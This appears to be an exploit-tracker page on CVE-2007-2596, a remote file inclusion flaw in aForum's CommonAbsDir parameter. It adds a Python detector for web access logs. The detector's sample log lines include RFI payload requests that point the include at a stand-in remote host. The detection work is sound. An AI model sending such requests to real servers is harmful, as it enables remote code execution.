CVE-2007-2596
aForum < 1.32 - Remote File Inclusion via CommonAbsDir Parameter
Title source: llm
Exploitation Summary
EIP tracks 1 public exploit for CVE-2007-2596. PoCs published by ThE TiGeR.
AI-analyzed exploit summary: This exploit demonstrates a Remote File Inclusion (RFI) vulnerability in AForum <=1.33 by manipulating the 'CommonAbsDir' parameter in 'func.php' to include a remote shell. The attack requires the target server to have 'allow_url_include' enabled in PHP.
Description
PHP remote file inclusion vulnerability in common/func.php in aForum 1.32 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the CommonAbsDir parameter.
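For detection, the pattern described above is visible in web server access logs as a request to common/func.php whose CommonAbsDir query parameter decodes to a URL. The following is an added example, not part of the advisory or of aForum; it assumes combined-format access logs, and the log lines, IP addresses and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines (combined log format); addresses and hosts are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/May/2007:10:00:01 +0000] "GET /aforum/common/func.php'
    '?CommonAbsDir=http://remote.example/x.txt? HTTP/1.1" 200 512',
    '198.51.100.8 - - [01/May/2007:10:00:05 +0000] "GET /aforum/common/func.php'
    '?CommonAbsDir=hTTp%3A%2F%2Fremote.example%2Fx HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/May/2007:10:01:00 +0000] "GET /aforum/index.php?page=2 HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/May/2007:10:02:00 +0000] "GET /search.php'
    '?q=CommonAbsDir+http://docs HTTP/1.1" 200 900',
    '198.51.100.9 - - [01/May/2007:10:03:00 +0000] "GET /aforum/common/func.php'
    '?CommonAbsDir=..%2Fcommon%2F HTTP/1.1" 200 100',
]

# Client address and request target from one access-log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with "<scheme>://" is a URL, whatever the letter case.
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.IGNORECASE)


def find_rfi_attempts(lines):
    """Return (client_ip, decoded_value) for each request to common/func.php
    whose CommonAbsDir parameter carries a URL after one round of decoding."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/common/func.php"):
            continue  # the parameter name elsewhere (e.g. a search) is not a hit
        # parse_qsl percent-decodes once, as PHP does when filling the parameter.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name == "CommonAbsDir" and SCHEME_RE.match(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"{client} CommonAbsDir={value}")
```

Access logs record only the query string, so a value sent in a POST body is not covered by this check.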